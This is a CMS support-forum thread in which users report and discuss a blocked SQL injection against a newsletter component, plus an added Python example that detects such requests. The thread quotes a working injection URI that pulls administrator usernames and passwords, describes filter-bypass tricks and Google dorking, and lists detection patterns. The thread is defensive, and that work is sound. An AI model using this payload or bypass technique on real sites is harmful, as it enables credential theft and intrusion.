Elxis CMS Forum

Support => Security => Topic started by: datahell on December 29, 2008, 20:59:36

Title: Attacks to Newsletter
Post by: datahell on December 29, 2008, 20:59:36
Elxis Defender blocked a couple of attacks to the IOS Newsletter component. I immediately searched the component for security holes, but I discovered that the attack was for a Joomla component with the same name! The 2 components have nothing in common, so there is nothing to worry about. I just inform people using the IOS Newsletter component that if you get a similar attack, don't worry: the attack is addressed to Joomla web sites. Elxis' IOS Newsletter is absolutely secure. Joomla's Newsletter component is vulnerable to SQL injection attacks.

Here is the requested URI as caught by Elxis Defender:

index.php?option=com_newsletter&Itemid=-1&listid=-1 union select 1,concat(0x40,username,0x40,password,0x40) from #__users where gid=25/*

The above URL can not harm Elxis or IOS Newsletter.
Title: Re: Attacks to Newsletter
Post by: rentasite on December 30, 2008, 01:02:46
Quote
but I discovered that the attack was for a Joomla component with the same name!

a newsletter component for Joomla, with the same name !!?!!?!!  :o


Edit: Got an attack logged also, on one of my client's site.

Requested URI: /com_newsletter/index.php?option=com_newsletter&Itemid=-1&listid=-1 union select 1,concat(0x40,username,0x40,password,0x40) from #__users where gid=25/*
Title: Re: Attacks to Newsletter
Post by: datahell on December 30, 2008, 08:32:14
The "listid" parameter in the URL does not exist in IOS Newsletter.
How hackers attack:
When a vulnerability is discovered, hackers search Google for sites having a characteristic word in the URL in order to find vulnerable sites. In this case they could search for inurl:com_newsletter or use "allinurl".
They create a list of sites that match Google's search results and begin to attack using a pre-made script.

So, together with the Joomla sites they also find Elxis sites from Google having "com_newsletter" in the URL. But IOS Newsletter is absolutely secure. Do not worry.

I must say once more:
1. Always update your sites to the latest Elxis version.
2. Enable Elxis Defender and set some good filters.
3. Enable SEO PRO.
Title: Re: Attacks to Newsletter
Post by: Farhad Sakhaei on December 30, 2008, 11:54:27
Quote
How attackers attack:
When a vulnerability is discovered, hackers search Google for sites having a characteristic word in the URL in order to find vulnerable sites. In this case they could search for inurl:com_newsletter or use "allinurl".

This is Dork ... Like Google Dork (inurl: ...)

Quote
I must say once more:
1. Always update your sites to the latest Elxis version.
2. Enable Elxis Defender and set some good filters.
3. Enable SEO PRO.

And also consider your server security and choose a good, secured server  :)
Title: Re: Attacks to Newsletter
Post by: ks-net on December 30, 2008, 21:06:53
Quote
I must say once more:
1. Always update your sites to the latest Elxis version.
2. Enable Elxis Defender and set some good filters.
3. Enable SEO PRO.

It is time to ask... I wanted to ask this question for months but always forgot to do it..
Now it is time...

1. What other possible filters (except the example filters on the Defender page) can we add, and for what purpose in each case?

2. The example filters on the Defender page in red color are supposed to be the most necessary.... if I guess right! Are they?
   Are there any other filters not listed there... I mean filters that block well-known ways (in the URL) of attack? ....It is sure that there are a lot of ways that someone can use to attack... Is there a resource to give us more info?

Title: Re: Attacks to Newsletter
Post by: datahell on December 31, 2008, 08:53:12
There are 2 kinds of attacks: attempts to modify configuration options (XSS) and SQL injections.
Most of the first ones are intercepted easily with a simple "mosconfig" filter. You should also make sure that allow_url_fopen is disabled in your PHP. The only problem with this filter is that you have to temporarily disable Defender if you wish to modify the Elxis configuration, otherwise you will be banned from your site!
SQL injection attacks are harder to defend against, as hackers can use many variations of SQL commands and it is harder to block all of them. For instance, if we have set the filter "union select", a hacker may use "union/**/ select" to bypass our filter. Also, many attacks use hex to bypass blocking mechanisms. So it is absolutely necessary that the software we use is as secure as possible, so that even if an attack manages to pass to the inner script it is not able to harm it.

To find good filters, study the way hackers attack. If you search the internet you will find lots of exploits. Use key words from these exploits as Defender filters. The sample filters Defender has are all used in real attacks and they are good, but you can also use others.
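As an added example (not code from Elxis, Defender, or any poster in this thread), here is request-log detection logic that canonicalises the URI before matching, so the comment and hex variants datahell describes above, and the "listid" injection quoted at the top of the thread, are caught by one rule instead of one literal filter per spelling. The sample URIs are constructed; the first is the one reported in the opening post, and the "mosConfig" line is an assumed example of the configuration-override requests the "mosconfig" filter is meant for.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request URIs. The first is the one quoted in this thread;
# the rest are variants of the kind the discussion describes (comment, encoding
# and hex tricks), plus two benign requests to show what must not be flagged.
SAMPLE_URIS = [
    "/index.php?option=com_newsletter&Itemid=-1&listid=-1 union select 1,concat(0x40,username,0x40,password,0x40) from #__users where gid=25/*",
    "/index.php?option=com_newsletter&listid=-1%20union/**/select%201,2%20from%20%23__users",
    "/index.php?option=com_newsletter&listid=-1+UNION+ALL+SELECT+1,2--",
    "/index.php?option=com_content&mosConfig_absolute_path=http://example.invalid/x.txt",  # assumed
    "/index.php?option=com_newsletter&Itemid=12",
    "/index.php?option=com_content&task=view&id=0x40",
]

def normalize(uri: str) -> str:
    """Canonicalise a URI so that encoding and comment tricks do not hide keywords."""
    s = unquote_plus(unquote_plus(uri))         # two passes also catch double-encoding
    s = re.sub(r"/\*.*?(?:\*/|$)", " ", s)     # '/**/' or a trailing '/*' behaves as a space
    s = re.sub(r"\s+", " ", s)                 # collapse runs of whitespace
    return s.lower()

# Indicators are evaluated on the normalised string, so "union/**/select",
# "union%20select" and "UNION+ALL+SELECT" all hit the same pattern.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "concat":       re.compile(r"\bconcat\s*\("),
    "hex_literal":  re.compile(r"\b0x[0-9a-f]{2,}\b"),
    "table_prefix": re.compile(r"#__\w+"),          # CMS table-prefix placeholder
    "mosconfig":    re.compile(r"mosconfig_\w+="),  # configuration-override attempt
}
STRONG = {"union_select", "mosconfig"}             # one hit is enough on its own

def classify(uri: str) -> list:
    """Return the names of all indicators found in the normalised URI."""
    n = normalize(uri)
    return [name for name, rx in INDICATORS.items() if rx.search(n)]

def is_attack(uri: str) -> bool:
    """Flag on a strong indicator, or on two weaker ones together.
    A lone hex literal (e.g. id=0x40) is not enough: legitimate parameters can look like that."""
    hits = set(classify(uri))
    return bool(hits & STRONG) or len(hits) >= 2

def flagged(uris) -> list:
    return [u for u in uris if is_attack(u)]

if __name__ == "__main__":
    for u in SAMPLE_URIS:
        print("BLOCK" if is_attack(u) else "allow", classify(u), u)
```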
Title: Re: Attacks to Newsletter
Post by: rentasite on February 11, 2009, 22:35:59

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 58.241.255.38 (blocked)

Requested URI: /com_downloads/index.php?option=com_newsletter&Itemid=-1&listid=-1 union select 1,concat(0x40,username,0x40,password,0x40) from #__users where gid=25/*

DATE: 11-02-2009 22:04:47
Attack was logged
Title: Re: Attacks to Newsletter
Post by: datahell on February 11, 2009, 22:43:16
Don't worry. We have referred to this before. The attack is addressed to a Mambo component with the same name (but with nothing more in common). You can see this from the URL: it says "listid", which does not exist in IOS Newsletter. IOS Newsletter is absolutely secure  :)